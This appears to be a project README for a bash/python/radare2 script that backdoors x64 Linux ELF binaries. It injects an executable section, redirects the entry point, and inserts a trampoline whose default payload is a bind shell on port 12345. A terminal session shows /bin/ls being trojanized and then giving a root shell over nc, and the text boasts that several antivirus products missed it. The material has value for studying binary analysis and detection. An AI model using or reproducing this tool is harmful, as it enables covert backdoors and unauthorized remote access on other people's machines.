Quick and Dirty Backdooring script x64 ELF binaries Manually injecting shellcode into an arbitrary address of an ELF and hope it does not break, using bash/python/radare2.
I'm not responsible for the malicious any usage of this script, execute the binary generated by the script on machines with permission of the owners. This tool is only a side project I played with.
This was inspired by reading Practical Binary Analysis book, it was a great ressource to get the basics right.
How the Inject script work.
- Inject new read/write/execute section, used with objcopy.
- Change Entry point to the new section with radare2.
- Put the payload in the new section, used nasm+ld to compile the Trampoline payload, the default paylaod is a bind shell that listens on 12345.
- Jump back to the original Entrypoint when at the end of the Trampoline payload.
The trick is to set the section offset on unused code to avoid seg faults. Successfull test on ls with 0xbeef section offset, no detection from AV like symantec, Kaspersky, fortinet ... was quite surprised for a first attempt. UPDATE 2020-07-18 got detected by Avast, AVG.
- radare2
- python
[BlackB0x DirtyELFInjector ]# ./Inject
What Binary you want backdoor in /bin?
ls
0x0000000000002a8 0x00002a8
0x0000000000002e8 0x00002e8
0x000000000000308 0x0000308
0x0000000000003b8 0x00003b8
0x000000000000fb8 0x0000fb8
0x000000000001574 0x0001574
0x000000000001678 0x0001678
0x0000000000016f8 0x00016f8
0x0000000000034f8 0x00034f8
0x000000000004000 0x0004000
0x000000000004020 0x0004020
0x000000000004040 0x0004040
0x0000000000173c4 0x00173c4
0x000000000018000 0x0018000
0x00000000001d324 0x001d324
0x00000000001dc78 0x001dc78
0x000000000021fd0 0x0020fd0
0x000000000021fd8 0x0020fd8
0x000000000021fe0 0x0020fe0
0x000000000022a58 0x0021a58
0x000000000022c58 0x0021c58
0x000000000023000 0x0022000
0x000000000023280 0x0022268
0x000000000000000 0x0022268
0x000000000000000 0x00222b4
Section Offset? format: 0xbeef
0xbeef
LESO=efbe
objcopy: stVsHkjd: warning: allocated section `.backdoor' not in segment
objcopy: stcR435f: warning: allocated section `.backdoor' not in segment
Original entry=0x5b20
size of shellcode :173 bytes
jmp entry offset=0xbf9c
Warning: run r2 with -e io.cache=true to fix relocations in disassembly
Written 5 byte(s) (jmp 0x5b20 ) = wx e97f9bffff
-- In Soviet Russia, radare2 has documentation.
^D
[BlackB0x DirtyELFInjector]# file injected_ls
injected_ls: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=4fef2dc9762eb7d4593f402a65cc02bb3d4c48de, for GNU/Linux 3.2.0, stripped
[BlackB0x ls_rev_shell]# netstat -tunelp |grep 12345
[BlackB0x ls_rev_shell]# ./injected_ls
a.out bindshell.o gocave InjectBytes.py injected_git nopsection OLD README.md Trampoline.asm WORKS
bindshell.asm Enum Inject injected_find injected_ls objcopy Plan shellcode Trampoline.o
[BlackB0x DirtyELFInjector]# netstat -tunelp |grep 12345
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN 0 941082 28768/./injected_ls
[BlackB0x DirtyELFInjector]# nc localhost 12345
id
uid=0(root) gid=0(root) groups=0(root)
^C[BlackB0x DirtyELFInjector]# netstat -tunelp |grep 12345